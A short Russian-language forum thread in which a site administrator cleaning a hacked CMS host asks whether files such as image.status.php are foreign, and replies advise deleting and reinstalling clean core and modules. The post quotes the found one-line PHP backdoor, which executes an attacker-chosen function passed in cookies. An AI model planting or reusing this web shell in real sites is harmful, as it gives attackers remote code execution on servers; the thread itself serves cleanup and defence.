Хост из за несвоевременного обновления cms, ну и по причине наплевательского отношения хозяина сайтов был поражен вирусами. Сижу чищу. Вызывают сомнения файлы расположеные в разных частях ядра и установленых модулей с содержимым: <?php if(isset($_COOKIE["JHC"])){$_COOKIE["kRNq"]($_COOKIE["JHC"]);exit;}
. Имена файлов типа: image.status.php. Думаю подобные файлы инородные и их следует удалить?
Комментарии
Да.
Советовали же уже в последних темах про взлом.
Ядро и модули полностью удалить, кроме папки sites, robots, htaccess И закачать все чистое с оф. сайта.
Если есть незаряженная версия - можно так же сравнить Гитом.